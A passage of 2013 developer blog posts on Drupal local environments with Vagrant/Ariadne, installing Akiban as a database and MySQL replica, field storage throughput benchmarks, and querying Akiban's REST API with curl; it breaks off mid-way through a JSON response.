Padraig O'Sullivan

Local Development with Ariadne

2013-05-13T00:00:00-07:00

I recently started a new development position with Blink Reaction so I needed to get somewhat serious about setting up a local Drupal development environment.

Ariadne

I was leaning towards making use of Vagrant for managing local development environments so I can easily switch between different projects or branches. I also believe Vagrant makes it easier to have as close a mirror to production locally as possible.

I discovered a very interesting project from MyPlanet Digital named vagrant-ariadne. Ariadne is a customized implementation of Vagrant and allows for easy deployment of Drupal installation profiles to a local VM. Another nice feature is that it attempts to emulate Acquia’s infrastructure. This is useful as a lot of Blink’s clients are deployed on the Acquia Cloud.

Assuming you have Vagrant, rvm and a ruby environment installed on your workstation, installing Ariadne is pretty straightforward:

vagrant gem install vagrant-vbguest vagrant-hostmaster vagrant-librarian
[sudo] gem install librarian rake knife-solo
git clone https://github.com/myplanetdigital/vagrant-ariadne.git
cd vagrant-ariadne
bundle install
bundle exec rake setup

Everything is now configured to boot a virtual box. Ariadne comes with a simple example that can be deployed:

project=example vagrant up

Once that command finishes running, the site can be viewed at http://example.dev/ (Ariadne uses vagrant-hostmaster for managing /etc/hosts entries).

A more involved example is the cookbook for deploying the Web Experience Toolkit, which is also available on GitHub. If we wanted to deploy the master branch of this site, we could do:

bundle exec rake "init_project[https://github.com/wet-boew/ariadne-wet-boew-drupal]"
project=wet-boew-drupal branch=master vagrant up

And that’s it!

Another nice feature of these deployed environments is that they are configured to allow remote debugging (relevant when setting up an IDE as mentioned later) and the actual site code is shared as an NFS mount. For example, the contents of my /etc/exports file after booting a box with Ariadne look like:

# VAGRANT-BEGIN: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e
"/Users/posullivan/vagrant-ariadne/tmp/apt/cache" 33.33.33.10 -mapall=501:20
"/Users/posullivan/vagrant-ariadne/tmp/drush/cache" 33.33.33.10 -mapall=501:20
"/Users/posullivan/vagrant-ariadne/data/html" 33.33.33.10 -mapall=501:20
# VAGRANT-END: 7ac1cf50-4498-4e49-bd66-edac4a9b2d7e

Thus, if I navigate to the ~/vagrant-ariadne/data/html directory or import that in my IDE, I can edit the code deployed on the vagrant box.

Drupal Core from git

Another use I’ve found for Ariadne is building a local environment for the latest Drupal core. To accomplish this, I created a role file named roles/core.rb with the following contents:

name "core"
description "Install requirements to run Drupal core."
run_list([
  "recipe[mysql::server]",
  "recipe[mysql::client]",
  "recipe[php::module_mysql]",
  "recipe[php::module_curl]",
  "recipe[php::module_gd]",
  "recipe[php::module_apc]",
  "recipe[drush::utils]",
  "recipe[drush::make]",
  "recipe[php::write_inis]",
])
default_attributes({
  :drush => {
    :version => "5.8.0",
  },
  :mysql => {
    :server_debian_password => "root",
    :server_root_password => "root",
    :server_repl_password => "root",
    :bind_address => "127.0.0.1",
    :tunable => {
      :key_buffer => "384M",
      :table_cache => "4096",
    },
  },
})

Next, I created a new cookbook project named core and created a simple default.rb recipe for this cookbook. This recipe looks like:

branch = node['ariadne']['branch']

git "/mnt/www/html/drupal" do
  user "vagrant"
  repository "http://git.drupal.org/project/drupal.git"
  reference branch
  enable_submodules true
  action :sync
  notifies :run, "bash[Installing Drupal...]", :immediately
end

bash "Installing Drupal..." do
  user "vagrant"
  group "vagrant"
  code <<-EOH
    drush -y si \
      --root=/mnt/www/html/drupal \
      --db-url=mysqli://root:root@localhost/drupal \
      --site-name="Drupal Core Installed from Git" \
      --site-mail=vagrant+site@localhost \
      --account-mail=vagrant+admin@localhost \
      --account-name=admin \
      --account-pass=admin
  EOH
end

site = node['ariadne']['host_name'].nil? ? "#{node['ariadne']['project']}.dev" : node['ariadne']['host_name']

web_app site do
  cookbook "ariadne"
  template "drupal-site.conf.erb"
  port node['apache']['listen_ports'].to_a[0]
  server_name site
  server_aliases [ "www.#{site}" ]
  docroot "/mnt/www/html/drupal"
  notifies :reload, "service[apache2]"
end

With all of the above in place, it’s quite simple to create a local VM based on the latest in the 7.x branch of Drupal core:

project=core branch=7.x vagrant up

The above command simply needs to have the branch name modified to deploy a different branch. Once the above command completes, a site will be available at core.dev and I can log in as the admin user using the credentials specified in my cookbook.
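
Since the project and branch are just environment variables read by `vagrant up`, switching branches is easy to script. The following is a minimal Python sketch of that idea; the function names `ariadne_up_command` and `ariadne_up` are hypothetical helpers of my own, not part of Ariadne, and the only things taken from the command above are the `project` and `branch` variables and the `vagrant up` call.

```python
import os
import subprocess


def ariadne_up_command(project, branch=None, base_env=None):
    """Return (argv, env) equivalent to `project=... branch=... vagrant up`."""
    # Start from the current environment unless a base is supplied.
    env = dict(os.environ if base_env is None else base_env)
    env["project"] = project
    if branch is not None:
        env["branch"] = branch
    return ["vagrant", "up"], env


def ariadne_up(project, branch=None, cwd="."):
    """Boot the box; cwd is assumed to be the vagrant-ariadne checkout."""
    argv, env = ariadne_up_command(project, branch)
    subprocess.run(argv, env=env, cwd=cwd, check=True)


if __name__ == "__main__":
    argv, env = ariadne_up_command("core", "7.x", base_env={})
    print(argv, env)
```

Calling `ariadne_up("core", "7.x")` from a script would then be the equivalent of the command shown above.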

Private Repositories

Most client projects are stored in private repositories. Thankfully, that’s not an issue with Ariadne. Ariadne uses agent forwarding to forward the host machine’s SSH session into the VM, including keys and passphrases stored by ssh-agent. This means your VM will have the same Git/SSH access that you enjoy on your local machine. I’ve not had a problem checking out code stored in private repositories on Bitbucket, for example.

IDE

For an IDE, I’ve been an Eclipse user in the past for Java projects I’ve worked on so Aptana seemed like a good fit for my needs at the moment. Several articles already cover configuring Aptana for Drupal development so I’m not going to go into too much detail here.

Installation is very straightforward with the binary downloaded from the site. A ruble exists for Drupal so it’s pretty natural to install that:

git clone git://github.com/arcaneadam/Drupal-Bundle-for-Aptana.git ~/Documents/Aptana\ Rubles/Drupal-Bundle-for-Aptana

Next item is to configure Aptana to adhere to the Drupal coding standards. I used an existing profile for Aptana that could be imported for this.

The final thing I needed to configure was a debug configuration. To do this, I created a new PHP web page configuration. First, a new PHP server needs to be added. In this example, let’s assume I am using the example box I mentioned in the Ariadne section whose hostname is example.dev. The web server configuration dialog when configured with this hostname and appropriate directory for the site root looks like:

Once a PHP server has been added, the rest of the information to fill in for the debug configuration is pretty straightforward as shown below:

I like to select the break at first line option to make sure the debug configuration works correctly.

With this in place, any visit to example.dev will result in the breakpoint being hit.

Conclusion

I’ve still not settled on this combination for my development environment but I was definitely pretty excited upon discovering the Ariadne project. The drawbacks that I see to using Ariadne are: 1) the need to create a cookbook for each project you want to work with, 2) the project is still in beta stage so documentation is fairly lacking (fair enough for a beta project though), and 3) if you are not familiar with Chef, using Ariadne may prove challenging (although it provides the perfect excuse to become familiar with Chef).

PHPStorm is the IDE that seems to be pretty popular when I ask what other people are using for an editor but given there is a license fee associated with it, I didn’t want to splurge on that just yet. Aptana looks to work just fine for me and satisfies my needs nicely.

Akiban is Now Open Source

2013-04-02T00:00:00-07:00

I’ve written a lot about the work I do for Akiban with Drupal in the past and many people would ask if Akiban was open source software. Well in the last few weeks we actually open sourced our database server. We also have downloads for various platforms such as Windows and OSX besides binary packages for Linux variants.

I wrote previously about how to install Drupal 7 completely on Akiban. You can still follow that post to get up and running except now there is a tiny change for our public repositories:

sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-public/ lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server postgresql-client

Some of the things included in our open source database are:

spatial indexes
full text indexes (implemented using Lucene)
REST access
nested SQL

We are also working on a hosted service offering for our database server so there will be no need to manage an installation yourself. If you are interested in trying our service in its current beta form, please let me know in the comments or hit me up on Twitter and I’d be happy to hook you up, or just visit our website. We also have a public mailing list for the Akiban project if you try anything out and have any questions.

Akiban as a MySQL Replica with Drupal 7

2013-01-11T00:00:00-08:00

I previously wrote about how to install Drupal 7 completely on Akiban. However, this is not how our current customers are using us. The vast majority of all Drupal installations currently run on MySQL. What we at Akiban are currently aiming to do is to be deployed as a regular MySQL slave and if there are any queries that are problematic for MySQL, we work with customers to make sure those queries get executed by Akiban (and with a significant performance improvement).

In this post, I wanted to cover how to set up Akiban as a MySQL slave and how a query is typically redirected to an Akiban server from Drupal. This article is specific to Drupal 7.

First, I set up a regular Drupal install on Ubuntu 12.04 with MySQL 5.5.28. This is going to serve as the master server. Configuring replication in MySQL is pretty straightforward. The following needs to be placed in your my.cnf file and MySQL needs to be restarted:

log-bin=mysql-bin
server-id=11

A user needs to be created for replication:

CREATE USER 'repl'@'%' IDENTIFIED BY 'password';
GRANT REPLICATION SLAVE ON *.* TO 'repl'@'%';
FLUSH PRIVILEGES;

Next steps are to take a consistent snapshot of your Drupal schema with mysqldump and capture the output of SHOW MASTER STATUS to get the appropriate binlog co-ordinates.

Next, we need to set up an Akiban MySQL slave. We will use an entirely separate instance for this purpose. First, the software to install on this slave is:

sudo apt-get install -y mysql-client mysql-server
sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-developer/ lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server akiban-adapter-mysql postgresql-client
echo "INSTALL PLUGIN akibandb SONAME 'libakibandb_engine.so'" | mysql -u root

Issuing the SHOW PLUGINS command on this slave will now show the AkibanDB storage engine. The next step is to now import the mysqldump file taken from the master and configure replication. On the slave server, you need to make sure server-id is set in the my.cnf file. Then to enable replication, a CHANGE MASTER command needs to be issued. An example of what that command might look like is:

CHANGE MASTER TO
  MASTER_HOST = 'ec2-23-20-112-161.compute-1.amazonaws.com',
  MASTER_USER = 'repl',
  MASTER_PASSWORD = 'password',
  MASTER_LOG_FILE = 'mysql-bin.000001',
  MASTER_LOG_POS = 403
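
The log file and position in that statement come from the SHOW MASTER STATUS output captured on the master. As a rough sketch in Python, the statement could be assembled from that output as follows. The helper name `change_master_sql` and the host name `master.example.com` are my own placeholders, and the quoting is deliberately naive and only meant for illustration:

```python
def change_master_sql(host, user, password, master_status):
    """Build a CHANGE MASTER TO statement from a SHOW MASTER STATUS row.

    master_status is a dict holding the File and Position columns that
    SHOW MASTER STATUS reports on the master.
    """
    def quote(value):
        # Naive escaping for illustration; not a substitute for a client library.
        return "'" + str(value).replace("\\", "\\\\").replace("'", "\\'") + "'"

    return (
        "CHANGE MASTER TO\n"
        f"  MASTER_HOST = {quote(host)},\n"
        f"  MASTER_USER = {quote(user)},\n"
        f"  MASTER_PASSWORD = {quote(password)},\n"
        f"  MASTER_LOG_FILE = {quote(master_status['File'])},\n"
        f"  MASTER_LOG_POS = {int(master_status['Position'])};"
    )


if __name__ == "__main__":
    status = {"File": "mysql-bin.000001", "Position": 403}
    print(change_master_sql("master.example.com", "repl", "password", status))
```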

Finally, issuing START SLAVE starts up replication. The observant among you will notice all tables are still InnoDB on the slave. We have done nothing to convert any tables to Akiban yet. Before we get to that I want to configure Drupal running on the master server to know about the Akiban slave so it can send queries to it. First, we need to install the Akiban database module in Drupal (the akiban directory should be copied to whatever the appropriate location for your Drupal install is) and the PHP client drivers for PostgreSQL:

sudo apt-get install -y git php5-pgsql
git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban
cd akiban
git checkout 7.x
cd ../
sudo cp -R akiban /var/www/drupal/includes/database/.

Now, the settings.php file needs to be updated to know about this Akiban server:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
    'slave' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'ec2-23-22-113-161.compute-1.amazonaws.com',
      'port' => '15432',
      'driver' => 'akiban',
      'prefix' => '',
    ),
  ),
);

I would suggest enabling query logging on the Akiban server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the /etc/akiban/config/server.properties file to have these entries:

akserver.querylog.enabled=true
akserver.querylog.filename=/var/log/akiban/queries.log
akserver.querylog.exec_time_threshold=0

All queries issued against Akiban will now be logged to the /var/log/akiban/queries.log file since we set the query execution time threshold to 0. Akiban needs to be restarted for this to take effect.

By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to Akiban. The search module can be accessed from your Drupal site by going to http://your.ip.address/drupal/?q=search

First, we need to convert the tables used by search to Akiban; otherwise any search will fail, since no tables have been converted to Akiban yet. To convert these tables to Akiban, we simply issue the following in MySQL:

STOP SLAVE;
ALTER TABLE search_total ENGINE=AkibanDB;
ALTER TABLE search_index ENGINE=AkibanDB;
ALTER TABLE node ENGINE=AkibanDB;
ALTER TABLE search_index ADD CONSTRAINT `__akiban_fk_00` FOREIGN KEY (sid) REFERENCES node (nid);
ANALYZE TABLE node;
ANALYZE TABLE search_index;
ANALYZE TABLE search_total;
START SLAVE;

The relevant tables are now converted to Akiban. Now, try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the Akiban server when issuing content searches.

This is obviously a pretty simple example but now it’s pretty trivial to send more queries to Akiban. Just change the database target, convert the appropriate tables to Akiban on the slave, and away you go!

If there is anything you would like more information on, please let me know in the comments or hit me up on twitter and I’d be more than happy to dig in. We also have a public mailing list for the Akiban project and I’d encourage anyone who’s interested to subscribe to that list and let us know how we’re doing! Finally, I’ll be presenting on this topic at drupalcamp MA on January 19th and I am also delivering a joint webinar with Acquia in February on this topic.

Testing an Alternate Field SQL Storage Module

2013-01-08T00:00:00-08:00

After my post yesterday testing the field storage layer, a commenter pointed out an alternate SQL storage module that does not create a revision table for each field. Naturally, I had to try this out to see what kind of performance was possible with this approach.

The average throughput numbers I observed using this module are shown in the table below.

Environment	Average Throughput
Default MySQL	2892 nodes / minute
Default PostgreSQL	2313 nodes / minute
Tuned MySQL	4730 nodes / minute
Tuned PostgreSQL	2464 nodes / minute

The image below shows the results graphically for the different environments I tested. The Y axis is throughput (nodes per minute) with the X axis specifying the CSV file (corresponding to an MLB year) being imported.

That’s a pretty big improvement over the numbers I got in my original test. We still are not approaching the 8000 nodes per minute that is possible with a tuned MySQL instance and MongoDB for field storage but at about 5000 nodes per minute, we are getting somewhat close. It does beg the question of whether the performance benefits of MongoDB for field storage are worth it when we can get somewhat close using this module and a site’s original database system?
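
To put a number on that improvement, here is a small Python sketch that compares the averages from the table above with the averages from my original test. The figures are copied from the two result tables; the variable and function names are just for illustration.

```python
# Average throughput in nodes per minute, copied from the two result tables.
original = {
    "Default MySQL": 1932,
    "Default PostgreSQL": 1649,
    "Tuned MySQL": 3024,
    "Tuned PostgreSQL": 1772,
}
alternate = {
    "Default MySQL": 2892,
    "Default PostgreSQL": 2313,
    "Tuned MySQL": 4730,
    "Tuned PostgreSQL": 2464,
}
# Best result from the original test: tuned MySQL with MongoDB field storage.
best_mongodb = 7671


def percent_gain(before, after):
    """Relative improvement of `after` over `before`, in percent."""
    return (after - before) / before * 100.0


if __name__ == "__main__":
    for env, before in original.items():
        gain = percent_gain(before, alternate[env])
        print(f"{env}: {gain:.1f}% more nodes per minute")
    share = alternate["Tuned MySQL"] / best_mongodb
    print(f"Tuned MySQL reaches {share:.0%} of the best MongoDB result")
```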

I would be interested in suggestions for read benchmarks from the community for different field storage backends so I can attempt to gain more insight into this question for myself.

Field Storage Tests with Drupal 7

2013-01-07T00:00:00-08:00

I had some spare time this weekend and decided to do some tests with the field storage layer. I really just wanted to reproduce the results Moshe Weitzman published a while back. I also wanted to see what the best results I could get were.

Environment Details

The software and versions used for testing were:

EC2 EBS-backed Large instance (8GB of memory) in the US-EAST region
Ubuntu 12.04 (ami-fd20ad94 as listed in the official Ubuntu AMIs)
MySQL 5.5.28
PostgreSQL 9.2
MongoDB 2.0.4
Drupal 7.17
Drush 5.1
Migrate 2.5

I ran tests against both MySQL and PostgreSQL with default settings for both but I also ran tests where I modified the configuration of both systems to be optimized for writes.

The configuration options I specified for MySQL when tuning it were:

innodb_flush_log_at_trx_commit=0
innodb_doublewrite=0
log-bin=0
innodb_support_xa=0
innodb_buffer_pool_size=6G
innodb_log_file_size=512M

The configuration options I specified for PostgreSQL when tuning it were:

fsync = off
synchronous_commit = off
wal_writer_delay = 10000ms
wal_buffers = 16MB
checkpoint_segments = 64
shared_buffers = 6GB

Dataset

The dataset used for the tests comes from the migrate_example_baseball module that comes as part of the migrate module. This dataset contains a box score from every Major League Baseball game from the year 2000 to the year 2009. Each year’s data is contained in a CSV file. Different components of the box score are saved in fields, hence stressing field storage a lot.

Results

Average throughput numbers for the various configurations I tested are shown in the table below.

Environment	Average Throughput
Default MySQL	1932 nodes / minute
Default PostgreSQL	1649 nodes / minute
Tuned MySQL	3024 nodes / minute
Tuned PostgreSQL	1772 nodes / minute
Default MySQL with MongoDB	4609 nodes / minute
Default PostgreSQL with MongoDB	4810 nodes / minute
Tuned MySQL with MongoDB	7671 nodes / minute
Tuned PostgreSQL with MongoDB	5911 nodes / minute

Conclusion

It’s pretty obvious from glancing at the results above that using MongoDB for field storage results in the best throughput. Tuned MySQL using MongoDB for field storage gave me the best results. This is consistent with what Moshe reported in his original article as well.

What was very interesting to me was the PostgreSQL numbers. The overhead of having a table per field with the default SQL field storage seems to be very high with PostgreSQL. It’s interesting to see how much better an optimized PostgreSQL does when using MongoDB for field storage.
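
The speedup from switching field storage to MongoDB can be worked out directly from the results table. The Python sketch below does the division for each configuration; the numbers are the averages reported above and the names are only illustrative.

```python
# Average throughput in nodes per minute from the results table.
sql_field_storage = {
    "Default MySQL": 1932,
    "Default PostgreSQL": 1649,
    "Tuned MySQL": 3024,
    "Tuned PostgreSQL": 1772,
}
mongodb_field_storage = {
    "Default MySQL": 4609,
    "Default PostgreSQL": 4810,
    "Tuned MySQL": 7671,
    "Tuned PostgreSQL": 5911,
}


def speedup(baseline, improved):
    """How many times faster `improved` is than `baseline`."""
    return improved / baseline


if __name__ == "__main__":
    for env, baseline in sql_field_storage.items():
        factor = speedup(baseline, mongodb_field_storage[env])
        print(f"{env}: {factor:.2f}x with MongoDB field storage")
```

Both PostgreSQL configurations come out with a larger factor than their MySQL counterparts, which is what makes the PostgreSQL numbers stand out.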

After performing these tests, one experiment I really want to try now is to create a field storage module for PostgreSQL that uses the JSON data type included in the 9.2 release. Hopefully, I will get some spare time in the coming week or two to work on that.

Making Drupal more RESTful with Akiban

2012-12-17T00:00:00-08:00

Last week, I published an article on how to install Drupal 7 with Akiban as the backend database. Today, I wanted to briefly show off our REST API using the schema that is created with a standard install of Drupal 7 core.

First, I installed the devel module and generated some data since a bare bones install with no data would not be much fun. This server is running on a publicly available EC2 instance too so if you are interested in trying these examples out yourself at home, feel free to do so! I’ll leave the EC2 instance up and running for the remainder of 2012 but if anyone wants to try the examples out and the instance seems unavailable, please let me know and I’ll fire it up again for you.

For the first few examples, I’m going to use curl since it’s available on nearly every system (including OSX). Let’s first get the version of the Akiban server we are going to be interacting with:

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/version
[
{"server_name":"Akiban Server","server_version":"1.4.4.2451"}
]
$

Let’s continue this trend of a few simple examples to get started. I want to know the list of schemas on this server I am interacting with:

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/information_schema.schemata
[
{"schema_name":"drupal","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"information_schema","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"sqlj","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"sys","schema_owner":null,"default_character_set_name":null,"default_collation_name":null},
{"schema_name":"test","schema_owner":null,"default_character_set_name":null,"default_collation_name":null}
]
$

Let’s try a Drupal-specific example next. Our REST API allows you to retrieve an entire table group in one request. So let’s say I wanted to get all information for a certain user (I pretty-printed the JSON in the output below so if you run this you will need to format the output):

$ curl -X GET -H "Content-Type: application/json" http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/1
[
    {
        "uid": 1,
        "name": "posulliv",
        "pass": "$S$DPV31LZyFWJmJ.Fcj6IRyjb/RFMyQQtE87gsad7cavgnH3fw0GHA",
        "mail": "posullivan@akiban.com",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355345142,
        "access": 1355762571,
        "login": 1355345211,
        "status": 1,
        "timezone": "America/New_York",
        "language": "",
        "picture": 0,
        "init": "posullivan@akiban.com",
        "data": "YjowOw==",
        "drupal.authmap": [],
        "drupal.sessions": [
            {
                "uid": 1,
                "sid": "jq57PowPwDK1CuKBpC56oqt_PsbwWNF4av97BuQqr6I",
                "ssid": "",
                "hostname": "75.147.9.1",
                "timestamp": 1355762574,
                "cache": 0,
                "session": "YmF0Y2hlc3xhOjE6e2k6MTtiOjE7fWF1dGhvcml6ZV9maWxldHJhbnNmZXJfaW5mb3xhOjE6e3M6MzoiZnRwIjthOjU6e3M6NToidGl0bGUiO3M6MzoiRlRQIjtzOjU6ImNsYXNzIjtzOjE1OiJGaWxlVHJhbnNmZXJGVFAiO3M6NDoiZmlsZSI7czo3OiJmdHAuaW5jIjtzOjk6ImZpbGUgcGF0aCI7czoyMToiaW5jbHVkZXMvZmlsZXRyYW5zZmVyIjtzOjY6IndlaWdodCI7aTowO319YXV0aG9yaXplX29wZXJhdGlvbnxhOjQ6e3M6ODoiY2FsbGJhY2siO3M6Mjg6InVwZGF0ZV9hdXRob3JpemVfcnVuX2luc3RhbGwiO3M6NDoiZmlsZSI7czozNToibW9kdWxlcy91cGRhdGUvdXBkYXRlLmF1dGhvcml6ZS5pbmMiO3M6OToiYXJndW1lbnRzIjthOjM6e3M6NzoicHJvamVjdCI7czo1OiJkZXZlbCI7czoxMjoidXBkYXRlcl9uYW1lIjtzOjEzOiJNb2R1bGVVcGRhdGVyIjtzOjk6ImxvY2FsX3VybCI7czozNzoiL3RtcC91cGRhdGUtZXh0cmFjdGlvbi1kOWU4MTUzOS9kZXZlbCI7fXM6MTA6InBhZ2VfdGl0bGUiO3M6MTQ6IlVwZGF0ZSBtYW5hZ2VyIjt9bWVzc2FnZXN8YToxOntzOjU6ImVycm9yIjthOjI6e2k6MDtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO2k6MTtzOjI3NToiPGVtIGNsYXNzPSJwbGFjZWhvbGRlciI+V2FybmluZzwvZW0+OiBhcnJheV9rZXlfZXhpc3RzKCkgZXhwZWN0cyBwYXJhbWV0ZXIgMiB0byBiZSBhcnJheSwgbnVsbCBnaXZlbiBpbiA8ZW0gY2xhc3M9InBsYWNlaG9sZGVyIj50aGVtZV9pbWFnZV9mb3JtYXR0ZXIoKTwvZW0+IChsaW5lIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPjYwNTwvZW0+IG9mIDxlbSBjbGFzcz0icGxhY2Vob2xkZXIiPi92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYzwvZW0+KS4iO319"
            }
        ],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [
            {
                "uid": 1,
                "rid": 3
            }
        ],
        "drupal.watchdog": [
            {
                "wid": 160662,
                "uid": 1,
                "type": "php",
                "message": "JXR5cGU6ICFtZXNzYWdlIGluICVmdW5jdGlvbiAobGluZSAlbGluZSBvZiAlZmlsZSku",
                "variables": "YTo2OntzOjU6IiV0eXBlIjtzOjc6Ildhcm5pbmciO3M6ODoiIW1lc3NhZ2UiO3M6NjI6ImFycmF5X2tleV9leGlzdHMoKSBleHBlY3RzIHBhcmFtZXRlciAyIHRvIGJlIGFycmF5LCBudWxsIGdpdmVuIjtzOjk6IiVmdW5jdGlvbiI7czoyMzoidGhlbWVfaW1hZ2VfZm9ybWF0dGVyKCkiO3M6NToiJWZpbGUiO3M6NDU6Ii92YXIvd3d3L2RydXBhbC9tb2R1bGVzL2ltYWdlL2ltYWdlLmZpZWxkLmluYyI7czo1OiIlbGluZSI7aTo2MDU7czoxNDoic2V2ZXJpdHlfbGV2ZWwiO2k6NDt9",
                "severity": 4,
                "link": "0",
                "location": "aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv",
                "referer": "aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv",
                "hostname": "24.61.45.238",
                "timestamp": 1355406786
            }
        ]
    }
]
$
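
The long strings in fields such as data, session, message and variables look like Base64-encoded column values. That is an assumption based on the output above rather than something documented here. Under that assumption, a short Python sketch for turning them back into readable text would be (the helper name `decode_blob` is hypothetical):

```python
import base64


def decode_blob(value):
    """Decode a Base64-encoded column value into text (None stays None)."""
    if value is None:
        return None
    return base64.b64decode(value).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # The "data" value for uid 1 in the response above.
    print(decode_blob("YjowOw=="))  # prints b:0;
```

The decoded value `b:0;` is a PHP-serialized boolean false, which is the kind of value Drupal typically stores in that column.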

We also support multi-get so you can retrieve a number of table groups in a single REST API call. For example, let’s say I want to get information on 2 users:

$ curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/11467;10503"
[
    {
        "uid": 11467,
        "name": "clibriprofr",
        "pass": "",
        "mail": "clibriprofr@default",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355360324,
        "access": 0,
        "login": 0,
        "status": 1,
        "timezone": null,
        "language": "und",
        "picture": 11463,
        "init": "",
        "data": null,
        "drupal.authmap": [],
        "drupal.sessions": [],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [],
        "drupal.watchdog": []
    },
    {
        "uid": 10503,
        "name": "uuslosuwr",
        "pass": "",
        "mail": "uuslosuwr@default",
        "theme": "",
        "signature": "",
        "signature_format": null,
        "created": 1355360324,
        "access": 0,
        "login": 0,
        "status": 1,
        "timezone": null,
        "language": "und",
        "picture": 10499,
        "init": "",
        "data": null,
        "drupal.authmap": [],
        "drupal.sessions": [],
        "drupal.shortcut_set_users": [],
        "drupal.users_roles": [],
        "drupal.watchdog": []
    }
]
$
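
The same single-row and multi-get requests can be issued from a script. Below is a minimal Python sketch using only the standard library. The URL layout (schema.table followed by keys joined with a semicolon) is taken from the curl calls above; the helper names `entity_url` and `fetch_json` are my own, and the sketch assumes the EC2 instance is still reachable.

```python
import json
import urllib.request

BASE_URL = "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api"


def entity_url(schema, table, keys, base_url=BASE_URL):
    """Build the URL for one or more primary keys (multi-get uses ';')."""
    ids = ";".join(str(key) for key in keys)
    return f"{base_url}/{schema}.{table}/{ids}"


def fetch_json(url):
    """GET a URL with the same header as the curl examples and parse the JSON."""
    request = urllib.request.Request(url, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(request) as response:
        return json.load(response)


if __name__ == "__main__":
    url = entity_url("drupal", "users", [11467, 10503])
    print(url)
    # Uncomment to hit the server:
    # for user in fetch_json(url):
    #     print(user["uid"], user["name"])
```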

Our REST API also supports executing arbitrary SQL queries and returning the results as JSON. Let’s try a simple example first:

$ curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=select%20count(*)%20from%20drupal.comment"
[
{"_SQL_COL_1":252462}
]
$
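
Hand-encoding spaces as %20 gets tedious for longer queries. As a sketch, Python’s urllib.parse.quote can build the same URL; the helper name `query_url` is hypothetical, and leaving parentheses and the asterisk unescaped is a choice made here only so the result matches the curl call above.

```python
from urllib.parse import quote

BASE_URL = "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api"


def query_url(sql, base_url=BASE_URL):
    """Percent-encode a SQL statement into the q parameter of the query endpoint."""
    # Keep "(", ")" and "*" readable, as in the hand-written URL.
    return f"{base_url}/query?q={quote(sql, safe='()*')}"


if __name__ == "__main__":
    print(query_url("select count(*) from drupal.comment"))
```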

Another example of executing arbitrary SQL queries through our REST API with a more complex query follows. The query we will use for this example is:

SELECT c.* 
FROM   drupal.comment c 
       INNER JOIN drupal.node n 
               ON n.nid = c.nid 
WHERE  ( c.status = 1 ) 
       AND ( n.status = 1 ) 
ORDER  BY c.created DESC, 
          c.cid DESC 
LIMIT  10 offset 0

Running this query through our REST API and the result (again, nicely formatted) looks like:

$ curl -X GET -H "Content-Type: application/json" "http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=SELECT%20c.*%20FROM%20drupal.comment%20c%20INNER%20JOIN%20drupal.node%20n%20ON%20n.nid%20=%20c.nid%20WHERE%20(c.status%20=%201)%20AND%20(n.status%20=%201)%20ORDER%20BY%20c.created%20DESC,%20c.cid%20DESC%20LIMIT%2010%20OFFSET%200"
[
    {
        "cid": 304562,
        "pid": 0,
        "nid": 93450,
        "uid": 1,
        "subject": "this is a test comment",
        "hostname": "75.147.9.1",
        "created": 1355418376,
        "changed": 1355418376,
        "status": 1,
        "thread": "01/",
        "name": "posulliv",
        "mail": "",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304561,
        "pid": 304558,
        "nid": 93451,
        "uid": 3636,
        "subject": "Defui Enim Gemino Luctus Occuro Paulatim",
